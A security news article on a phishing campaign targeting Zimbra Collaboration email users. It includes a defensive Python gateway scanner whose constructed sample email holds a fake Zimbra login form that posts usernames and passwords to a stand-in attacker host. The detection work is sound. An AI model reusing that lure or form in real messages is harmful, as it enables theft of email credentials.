Since April 2023, an ongoing phishing campaign has been actively targeting Zimbra Collaboration email servers globally, as reported by researchers. The campaign operates by sending phishing emails to various organizations worldwide, with no specific sector or entity being singled out. The identity of the threat actor responsible for this campaign remains undisclosed at present.
The attack methodology involves sending phishing emails to potential victims, impersonating administrators from organizations. These emails notify recipients of an impending email server update that will lead to temporary account deactivation. Recipients are instructed to open an attached HTML file to receive details about the server upgrade and instructions on how to prevent account deactivation.
Upon opening the HTML attachment, a counterfeit Zimbra login page is presented. This fake page is meticulously designed to feature the logo and branding of the targeted company, adding an air of authenticity. Additionally, the username field in the login form will be prefilled, further convincing the targets of its legitimacy.
Passwords entered in the phishing form are transmitted to the threat actor’s server via an HTTPS POST request. In certain cases, compromised administrator accounts are exploited to establish new mailboxes, which are then used to disseminate phishing emails to other members of the organization.
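The lure described above (an HTML attachment rendering a login form that prefills the username and posts the password to an attacker-controlled host) can be screened for at the mail gateway. The following is an added example written for this article, not code from the researchers who reported the campaign; it assumes a hypothetical trusted webmail host `mail.example.org` and scans a constructed sample message rather than a real capture.

```python
"""Flag e-mails whose HTML attachment carries a credential-harvesting form.

Heuristic based on the campaign description: an HTML attachment that renders a
login form with a password field, posts it to a host outside the organisation,
and often prefills the username. The sample message below is constructed for
this example, not a real phishing capture.
"""
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

TRUSTED_HOSTS = {"mail.example.org"}  # assumption: the org's real Zimbra host


class FormScanner(HTMLParser):
    """Collect each <form> together with the <input> elements it contains."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(a)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def suspicious_forms(html, trusted_hosts=TRUSTED_HOSTS):
    """Return, per password form, the reasons it looks like a harvesting page."""
    scanner = FormScanner()
    scanner.feed(html)
    findings = []
    for form in scanner.forms:
        inputs = form["inputs"]
        has_password = any((i.get("type") or "").lower() == "password" for i in inputs)
        if not has_password:
            continue  # no credential being collected, not our concern here
        reasons = []
        host = urlparse(form["action"]).hostname or ""
        if host and host not in trusted_hosts:
            reasons.append(f"password form posts to external host {host}")
        # A prefilled username is one of the hallmarks noted in the campaign.
        prefilled = [i for i in inputs
                     if (i.get("type") or "text").lower() in ("text", "email")
                     and i.get("value")]
        if prefilled:
            reasons.append("username field is prefilled")
        if reasons:
            findings.append({"action": form["action"], "reasons": reasons})
    return findings


def scan_message(raw):
    """Parse a raw RFC 5322 message and scan every HTML part sent as an attachment."""
    msg = email.message_from_string(raw, policy=policy.default)
    results = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        if part.get_content_disposition() != "attachment":
            continue  # inline HTML bodies are handled by other controls
        findings = suspicious_forms(part.get_content())
        if findings:
            results.append({"filename": part.get_filename(), "findings": findings})
    return results


# Constructed sample resembling the described lure; hosts are placeholders.
SAMPLE_EML = """\
From: "IT Administrator" <admin@example.org>
To: alice@example.org
Subject: Mail server upgrade - action required
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="us-ascii"

Your account will be deactivated unless you confirm via the attached file.

--b1
Content-Type: text/html; charset="us-ascii"
Content-Disposition: attachment; filename="upgrade.html"

<html><body>
<form method="post" action="https://phish.example.net/collect.php">
  <input type="text" name="username" value="alice@example.org">
  <input type="password" name="password">
  <input type="submit" value="Sign In">
</form>
</body></html>

--b1--
"""

if __name__ == "__main__":
    for hit in scan_message(SAMPLE_EML):
        print(hit["filename"], hit["findings"])
```

The check deliberately keys on the combination the campaign relies on (password field plus an off-domain form action) rather than on any single attacker host, so it keeps working when the collection server changes; a quarantine or user warning is the natural action on a hit.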
“One explanation is that the adversary relies on password reuse by the administrator targeted through phishing – i.e., using the same credentials for both email and administration. From available data we are not able to confirm this hypothesis.”
Despite the campaign’s lack of sophisticated tactics, its reach and success are noteworthy. Researchers emphasize that users of Zimbra Collaboration should be cautious of this threat. Zimbra Collaboration email servers are commonly targeted by hackers for activities like cyber espionage, which involves collecting internal communications, or as an initial entry point to infiltrate the target organization’s network.
Earlier in the year, another analysis revealed the ‘Winter Vivern’ hacking group’s exploitation of a Zimbra Collaboration vulnerability (CVE-2022-27926) to gain access to webmail portals of NATO-aligned organizations, governments, diplomats, and military personnel. In a previous instance, a threat actor named ‘TEMP_Heretic’ utilized a zero-day flaw (CVE-2022-23682) in the Zimbra Collaboration product for mailbox access and lateral phishing attacks.
“The popularity of Zimbra Collaboration among organizations expected to have lower IT budgets ensures that it stays an attractive target for adversaries.”
In conclusion, Zimbra Collaboration’s popularity among organizations with constrained IT budgets keeps it a sought-after target for adversaries, underscoring the importance of heightened awareness and proactive defense against such phishing campaigns.